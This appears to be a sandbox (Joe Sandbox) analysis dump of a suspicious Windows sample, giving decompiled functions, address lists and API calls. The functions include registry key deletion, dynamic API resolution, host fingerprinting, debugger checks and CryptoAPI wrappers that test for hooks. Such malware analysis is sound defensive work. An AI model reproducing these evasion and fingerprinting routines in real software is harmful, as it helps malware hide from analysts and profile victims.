    0x004060d5
    0x00406056
    0x00406068
    0x0040607a
    0x0040608b
    0x0040609d
    0x004060a9
    0x004060a9
    0x004060e8
    0x004060f8
    0x0040610a
    0x0040610f
    0x00406118
    0x0040611d
    0x00406133
    0x00406138
    0x0040613f
    0x00000000
    0x00000000
    0x0040614f
    0x00406152
    0x00406154
    0x00406157
    0x00406166
    0x0040616e
    0x00406172
    0x00406174
    0x00000000
    0x00000000
    0x0040617a
    0x0040617e
    0x00000000
    0x00000000
    0x00406180
    0x00406184
    0x004061c5
    0x004061c9
    0x004061e4
    0x004061ec
    0x0040620a
    0x0040621d
    0x00406232
    0x00406247
    0x0040625c
    0x00406279
    0x0040628d
    0x00406292
    0x004062ad
    0x004062b5
    0x004062bf
    0x004062d2
    0x004062d7
    0x004062d9
    0x00406300
    0x0040630f
    0x00406313
    0x004062db
    0x004062de
    0x004062e8
    0x004062f2
    0x004062f9
    0x004062f9
    0x004061cb
    0x004061ce
    0x004061ce
    0x00000000
    0x004061c9
    0x0040618c
    0x00406191
    0x00000000
    0x00000000
    0x004061a5
    0x004061b8
    0x004061c0
    0x004061c0
    0x00000000
    0x004060fa
    0x004060fd
    0x0040631a
    0x0040631d
    0x00406325
    0x0040632d
    0x00000000
    0x0040632d
    0x004060f8
    0x00405d49
    0x00405d57
    0x00405d5a
    0x00405d66
    0x00405d69
    0x00000000
    0x00000000
    0x00405d6f
    0x00405d7c
    0x00000000
    0x00405d7c
    0x00405d5e
    0x00405d4b
    0x00405d4b
    0x00405d4b

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00408A48, Relevance: 3.0, APIs: 2, Instructions: 34nativewindow
    C-Code - Quality: 58%
    			E00408A48(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				void* _t12;
				void* _t24;

				_t12 = _a8 - 2;
				if(_t12 == 0) {
					PostQuitMessage(0);
					_v8 = 0;
				} else {
					if(_t12 == 0xf) {
						E004078FC(_a16 & 0x80000000, _t24);
						_v8 = 1;
					} else {
						_v8 =  *0x40b300(_a4, _a8, _a12, _a16);
					}
				}
				return _v8;
			}






    0x00408a51
    0x00408a54
    0x00408a5f
    0x00408a67
    0x00408a56
    0x00408a59
    0x00408a74
    0x00408a79
    0x00408a5b
    0x00408a98
    0x00408a98
    0x00408a59
    0x00408aa1

    APIs
    • PostQuitMessage.USER32(00000000), ref: 00408A5F
      • Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 0040795A
      • Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 0040796D
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00408A92
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00401928, Relevance: 3.0, APIs: 2, Instructions: 33library
    C-Code - Quality: 100%
    			E00401928(CHAR* __eax) {
				CHAR* _v8;
				_Unknown_base(*)()* _v12;
				CHAR* _v16;
				intOrPtr _v20;
				char _v149;
				void* _t37;

				_v8 = __eax;
				_v16 = _v8;
				while( *_v16 != 0x2e) {
					_v16 =  &(_v16[1]);
				}
				_v20 = _v16 - _v8;
				E004012B8( &_v149, _v20, _v8);
				 *((char*)(_t37 + _v20 - 0x91)) = 0;
				_v16 =  &(_v16[1]);
				_v12 = GetProcAddress(LoadLibraryA( &_v149), _v16);
				return _v12;
			}









    0x00401931
    0x00401937
    0x0040193f
    0x0040193c
    0x0040193c
    0x0040194d
    0x0040195c
    0x00401964
    0x0040196c
    0x00401987
    0x00401990

    APIs
    • LoadLibraryA.KERNEL32(00000000,00000000), ref: 0040197A
    • GetProcAddress.KERNEL32(00000000), ref: 00401981
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00403988, Relevance: 3.0, APIs: 2, Instructions: 24
    C-Code - Quality: 84%
    			E00403988(CHAR* __eax) {
				CHAR* _v8;
				signed char _v12;
				void* _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t16;

				_v8 = __eax;
				_v12 = 0;
				_t16 = FindFirstFileA(_v8,  &_v336);
				_v16 = _t16;
				asm("sbb eax, eax");
				_v12 =  ~(_t16 & 0xffffff00 | _v16 != 0xffffffff);
				FindClose(_v16);
				return _v12;
			}








    0x00403991
    0x00403996
    0x004039a4
    0x004039aa
    0x004039b6
    0x004039b8
    0x004039bf
    0x004039cb

    APIs
    • FindFirstFileA.KERNEL32(?,?), ref: 004039A4
    • FindClose.KERNEL32(000000FF), ref: 004039BF
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00401460, Relevance: 3.0, APIs: 2, Instructions: 18
    C-Code - Quality: 100%
    			E00401460(void* __eax, long __edx) {
				void* _v8;
				long _v12;
				void* _v16;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = RtlReAllocateHeap(GetProcessHeap(), 0, _v8, _v12);
				return _v16;
			}






    0x00401466
    0x00401469
    0x00401483
    0x0040148c

    APIs
    • GetProcessHeap.KERNEL32(00000000,?,?), ref: 00401476
    • RtlReAllocateHeap.NTDLL(00000000), ref: 0040147D
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00421620, Relevance: 2.6, Strings: 2, Instructions: 75
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00421360, Relevance: 2.5, Strings: 2, Instructions: 35
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00430D58, Relevance: 2.1, APIs: 1, Instructions: 592LIBRARYCODE
    APIs
    • ___mtold12.LIBCMT ref: 00431063
      • Part of subcall function 00429814: IsDebuggerPresent.KERNEL32 ref: 0042FAF6
      • Part of subcall function 00429814: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042FB0B
      • Part of subcall function 00429814: UnhandledExceptionFilter.KERNEL32(06D), ref: 0042FB16
      • Part of subcall function 00429814: GetCurrentProcess.KERNEL32 ref: 0042FB32
      • Part of subcall function 00429814: TerminateProcess.KERNEL32(00000000), ref: 0042FB39
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 004064BC, Relevance: 1.6, APIs: 1, Instructions: 91
    C-Code - Quality: 100%
    			E004064BC(char* __eax, char __edx, void* __eflags) {
				char* _v8;
				char _v9;
				struct _OSVERSIONINFOA _v168;
				char _v233;
				intOrPtr _t68;

				_v9 = __edx;
				_v8 = __eax;
				E00401258(_v8, 0x51);
				 *_v8 = _v9;
				E004012B8(_v8 + 0x10, 0x12, 0x40b719);
				E004012B8(_v8 + 1, E004012DC(0x40b794), 0x40b794);
				E00401258( &_v168, 0x9c);
				_v168.dwOSVersionInfoSize = 0x9c;
				GetVersionExA( &_v168);
				E00401864(_v168.dwMajorVersion,  &_v233);
				 *((char*)(_v8 + 0x22)) = _v233;
				 *((char*)(_v8 + 0x23)) = 0x2e;
				E00401864(_v168.dwMinorVersion,  &_v233);
				 *((char*)(_v8 + 0x24)) = _v233;
				_t68 =  *0x40a068; // 0x3
				E00401864(_t68,  &_v233);
				 *((char*)(_v8 + 0x26)) = _v233;
				if( *0x40a058 == 0) {
					 *((char*)(_v8 + 0x27)) = 0x30;
				} else {
					 *((char*)(_v8 + 0x27)) = 0x31;
				}
				if( *0x40a034 == 0) {
					 *((char*)(_v8 + 0x28)) = 0x30;
				} else {
					 *((char*)(_v8 + 0x28)) = 0x31;
				}
				if(E00403EA0() == 0) {
					 *((char*)(_v8 + 0x25)) = 0x30;
				} else {
					 *((char*)(_v8 + 0x25)) = 0x31;
				}
				 *((intOrPtr*)(_v8 + 0x29)) = E00405468();
				return E00401308(_v8 + 0x2d, 0x40b00c);
			}








    0x004064c5
    0x004064c8
    0x004064d3
    0x004064de
    0x004064f0
    0x0040650a
    0x0040651a
    0x0040651f
    0x00406530
    0x00406544
    0x00406555
    0x0040655b
    0x0040656d
    0x0040657e
    0x00406588
    0x0040658e
    0x0040659f
    0x004065a9
    0x004065b7
    0x004065ab
    0x004065ae
    0x004065ae
    0x004065c2
    0x004065d0
    0x004065c4
    0x004065c7
    0x004065c7
    0x004065db
    0x004065e9
    0x004065dd
    0x004065e0
    0x004065e0
    0x004065f5
    0x0040660b

    APIs
    • GetVersionExA.KERNEL32(0000009C), ref: 00406530
      • Part of subcall function 00401864: wsprintfA.USER32 ref: 00401874
      • Part of subcall function 00403EA0: RegCreateKeyExA.ADVAPI32(80000002,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00403ECD
      • Part of subcall function 00403EA0: RegCreateKeyExA.ADVAPI32(80000001,004021A4,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00403EF3
      • Part of subcall function 00405468: GetSystemTime.KERNEL32(?), ref: 00405472
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00401AAE, Relevance: 1.5, APIs: 1, Instructions: 30encryption
    APIs
    • CryptEncrypt.ADVAPI32(?,?,?,?,?,?,?), ref: 00401AE5
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00401AB0, Relevance: 1.5, APIs: 1, Instructions: 29encryption
    APIs
    • CryptEncrypt.ADVAPI32(?,?,?,?,?,?,?), ref: 00401AE5
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004017A2, Relevance: 1.5, APIs: 1, Instructions: 28encryption
    C-Code - Quality: 100%
    			E004017A2(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
				long* _v8;
				long* _v12;
				int _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x40b460)) != 0xe9) {
					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
				}
				return _v20;
			}







    0x004017aa
    0x004017ad
    0x004017b0
    0x004017bb
    0x004017db
    0x004017db
    0x004017e4

    APIs
    • CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 004017D5
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004017A4, Relevance: 1.5, APIs: 1, Instructions: 27encryption
    C-Code - Quality: 100%
    			E004017A4(long* __eax, int __ecx, long* __edx, DWORD* _a4, BYTE* _a8, int _a12) {
				long* _v8;
				long* _v12;
				int _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x40b460)) != 0xe9) {
					_v20 = CryptDecrypt(_v8, _v12, _v16, _a12, _a8, _a4);
				}
				return _v20;
			}







    0x004017aa
    0x004017ad
    0x004017b0
    0x004017bb
    0x004017db
    0x004017db
    0x004017e4

    APIs
    • CryptDecrypt.ADVAPI32(?,?,?,?,?,?), ref: 004017D5
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004018A0, Relevance: 1.5, APIs: 1, Instructions: 27encryption
    C-Code - Quality: 100%
    			E004018A0(long* __eax, int __ecx, BYTE* __edx, HCRYPTKEY* _a4, int _a8, long* _a12) {
				long* _v8;
				BYTE* _v12;
				int _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x40b500)) != 0xe9) {
					_v20 = CryptImportKey(_v8, _v12, _v16, _a12, _a8, _a4);
				}
				return _v20;
			}







    0x004018a6
    0x004018a9
    0x004018ac
    0x004018b7
    0x004018d7
    0x004018d7
    0x004018e0

    APIs
    • CryptImportKey.ADVAPI32(?,?,?,?,?,?), ref: 004018D1
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00408A44, Relevance: 1.5, APIs: 1, Instructions: 26nativewindow
    C-Code - Quality: 58%
    			E00408A44(intOrPtr* __eax, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v8;
				intOrPtr _v117;
				void* _t15;
				void* _t27;

				 *__eax =  *__eax + __eax;
				_v117 = _v117 + __edx;
				_t15 = _a12 - 2;
				if(_t15 == 0) {
					PostQuitMessage(0);
					_v8 = 0;
				} else {
					if(_t15 == 0xf) {
						E004078FC(_a16 & 0x80000000, _t27);
						_v8 = 1;
					} else {
						_v8 =  *0x40b300(_a4, _a8, _a12, _a16);
					}
				}
				return _v8;
			}







    0x00408a45
    0x00408a47
    0x00408a51
    0x00408a54
    0x00408a5f
    0x00408a67
    0x00408a56
    0x00408a59
    0x00408a74
    0x00408a79
    0x00408a5b
    0x00408a98
    0x00408a98
    0x00408a59
    0x00408aa1

    APIs
      • Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000002,004021A4), ref: 0040795A
      • Part of subcall function 004078FC: SHDeleteKeyA.SHLWAPI(80000001,004021A4), ref: 0040796D
    • PostQuitMessage.USER32(00000000), ref: 00408A5F
    • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00408A92
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004017E8, Relevance: 1.5, APIs: 1, Instructions: 25encryption
    C-Code - Quality: 100%
    			E004017E8(HCRYPTPROV* __eax, char* __ecx, char* __edx, int _a4, int _a8) {
				HCRYPTPROV* _v8;
				char* _v12;
				char* _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x40b4fc)) != 0xe9) {
					_v20 = CryptAcquireContextA(_v8, _v12, _v16, _a8, _a4);
				}
				return _v20;
			}







    0x004017ee
    0x004017f1
    0x004017f4
    0x004017ff
    0x0040181b
    0x0040181b
    0x00401824

    APIs
    • CryptAcquireContextA.ADVAPI32(?,?,?,?,?), ref: 00401815
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00401374, Relevance: 1.5, APIs: 1, Instructions: 25encryption
    APIs
    • CryptCreateHash.ADVAPI32(?,?,?,?,?), ref: 004013A1
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00401490, Relevance: 1.5, APIs: 1, Instructions: 25encryption
    APIs
    • CryptGetHashParam.ADVAPI32(?,?,?,?,?), ref: 004014BD
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00401402, Relevance: 1.5, APIs: 1, Instructions: 24encryption
    APIs
    • CryptHashData.ADVAPI32(?,?,?,?), ref: 0040142D
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00401574, Relevance: 1.5, APIs: 1, Instructions: 23encryption
    APIs
    • CryptSetKeyParam.ADVAPI32(?,?,?,?), ref: 0040159D
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00401404, Relevance: 1.5, APIs: 1, Instructions: 23encryption
    APIs
    • CryptHashData.ADVAPI32(?,?,?,?), ref: 0040142D
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 0040153C, Relevance: 1.5, APIs: 1, Instructions: 21encryption
    C-Code - Quality: 100%
    			E0040153C(long* __eax, BYTE* __ecx, int __edx) {
				long* _v8;
				int _v12;
				BYTE* _v16;
				int _v20;

				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x40b458)) != 0xe9) {
					_v20 = CryptGenRandom(_v8, _v12, _v16);
				}
				return _v20;
			}







    0x00401542
    0x00401545
    0x00401548
    0x00401553
    0x00401567
    0x00401567
    0x00401570

    APIs
    • CryptGenRandom.ADVAPI32(?,?,?), ref: 00401561
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00401B20, Relevance: 1.5, APIs: 1, Instructions: 18encryption
    C-Code - Quality: 100%
    			E00401B20(long* __eax, int __edx) {
				long* _v8;
				int _v12;
				int _v16;

				_v12 = __edx;
				_v8 = __eax;
				if( *((char*)( *0x40b50c)) != 0xe9) {
					_v16 = CryptReleaseContext(_v8, _v12);
				}
				return _v16;
			}






    0x00401b26
    0x00401b29
    0x00401b34
    0x00401b44
    0x00401b44
    0x00401b4d

    APIs
    • CryptReleaseContext.ADVAPI32(?,?), ref: 00401B3E
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 004014D0, Relevance: 1.5, APIs: 1, Instructions: 16encryption
    APIs
    • CryptDestroyHash.ADVAPI32(?), ref: 004014E7
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00401AF8, Relevance: 1.5, APIs: 1, Instructions: 16encryption
    C-Code - Quality: 100%
    			E00401AF8(long* __eax) {
				long* _v8;
				int _v12;

				_v8 = __eax;
				if( *((char*)( *0x40b508)) != 0xe9) {
					_v12 = CryptDestroyKey(_v8);
				}
				return _v12;
			}





    0x00401afe
    0x00401b09
    0x00401b15
    0x00401b15
    0x00401b1e

    APIs
    • CryptDestroyKey.ADVAPI32(?), ref: 00401B0F
    Memory Dump Source
    • Source File: 00000000.00000002.27490373963.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490385970.00403000.00000020.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00405468, Relevance: 1.5, APIs: 1, Instructions: 13time
    C-Code - Quality: 100%
    			E00405468() {
				intOrPtr _v8;
				struct _SYSTEMTIME _v24;

				GetSystemTime( &_v24);
				_v8 = E004053D4( &_v24);
				return _v8;
			}





    0x00405472
    0x00405480
    0x00405489

    APIs
    • GetSystemTime.KERNEL32(?), ref: 00405472
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00406D40, Relevance: 1.5, APIs: 1, Instructions: 9
    C-Code - Quality: 100%
    			E00406D40() {
				int _v8;

				_v8 = IsDebuggerPresent();
				return _v8;
			}




    0x00406d4a
    0x00406d52

    APIs
    • IsDebuggerPresent.KERNEL32 ref: 00406D44
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    Function 00418620, Relevance: 1.3, Strings: 1, Instructions: 35
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00410210, Relevance: .1, Instructions: 56
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Function 00406C6C, Relevance: .0, Instructions: 47
    C-Code - Quality: 71%
    			E00406C6C(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v29;
				void* _t19;

				_v12 = __eax;
				_push(__eax);
				asm("cpuid");
				_v8 = 0xbadbad;
				_pop(_t19);
				if(_v8 > 0) {
					E00406C08(0x80000002,  &_v29);
					E00401308(_v12,  &_v29);
					E00406C08(0x80000003,  &_v29);
					E0040133C(_v12,  &_v29);
					E00406C08(0x80000004,  &_v29);
					return E0040133C(_v12,  &_v29);
				}
				return _t19;
			}







    0x00406c72
    0x00406c75
    0x00406c7e
    0x00406c8a
    0x00406c90
    0x00406c95
    0x00406c9f
    0x00406caa
    0x00406cb7
    0x00406cc4
    0x00406cd4
    0x00000000
    0x00406ce6
    0x00406cec

    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
